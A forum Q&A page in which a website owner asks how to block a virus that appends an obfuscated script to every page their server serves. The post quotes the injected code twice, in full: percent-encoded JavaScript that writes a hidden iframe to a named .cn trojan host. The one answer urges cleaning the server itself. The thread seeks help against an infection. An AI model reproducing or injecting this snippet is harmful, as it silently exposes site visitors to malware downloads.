Home/ Questions/Q 429505
In Process

The Archive Base Latest Questions

Editorial Team
  • 0
Asked: 2026-05-12T19:46:55+00:00

The server that has my website on it also has a virus on it.

  • 0

The server that has my website on it also has a virus on it.

The virus injects the malicious code

<b id="BAs"></b><script>/*Warning: Opera Only*/var hKo = document.createElement("script");hKo.text="document.write(unescape(\"%3c%69%66%72%61%6d%65%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%6e%63%63%63%6e%6e%6e%63%2e%63%6e%2f%69%6d%67%2f%69%6e%64%65%78%2e%70%68%70%27%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%3b%27%3e%3c%2f%69%66%72%61%6d%65%3e\"));";document.getElementById("BAs").appendChild(hKo)</script>

onto EVERY single page which is served, and it is being preprocessed by Apache or something similar to add it to the end of the file.

I created a test file, with the following code:

<html> 
<head> 
<title>Test HTML File</title> 
</head> 
<body> 
<h1>Test HTML File</h1> 
</body>
</html>

It isn’t pretty, but it served its purpose.

When viewing the page in my browser, I get 

<html> 
<head> 
<title>Test HTML File</title> 
</head> 
<body> 
<h1>Test HTML File</h1> 
<b id="BAs"></b><script>/*Warning: Opera Only*/var hKo = document.createElement("script");hKo.text="document.write(unescape(\"%3c%69%66%72%61%6d%65%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%6e%63%63%63%6e%6e%6e%63%2e%63%6e%2f%69%6d%67%2f%69%6e%64%65%78%2e%70%68%70%27%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%3b%27%3e%3c%2f%69%66%72%61%6d%65%3e\"));";document.getElementById("BAs").appendChild(hKo)</script> 
</body> 
</html>

which can be viewed from http://www.sagamountain.com/testfile.html (warning, this page is infected)

I need to programmatically stop that div and that script from executing, as it is an iframe to a site with a trojan on it. HTML, CSS, or JS, I just need some way to prevent that JS from executing.

It is already display:none so you cannot see it, but how can I prevent the iframe from ever loading at all?

Thanks for the help! The unescape thing resolves to an iframe to http://ncccnnnc.cn/img/index.php which is clearly the source of my troubles. Don’t go to that site!

EDIT: This is a followup to https://serverfault.com/questions/78439/my-website-is-infected-i-restored-a-backup-of-the-uninfected-files-how-long-wil/78459#78459

Share

Leave an answer

You must login to add an answer.

Need An Account,

1 Answer

  1. Editorial Team

    I’m sorry that I can’t answer your specific question, but I think that you’re looking at this the wrong way. What you need to do is not strip out the virus-inserted html, what you need to do is talk to your web-host/sysadmin and strip out the virus.

    Treating the symptoms won’t cure the infection. Treating the disease, however, will also treat the symptoms as well as removing the virus.

    • 0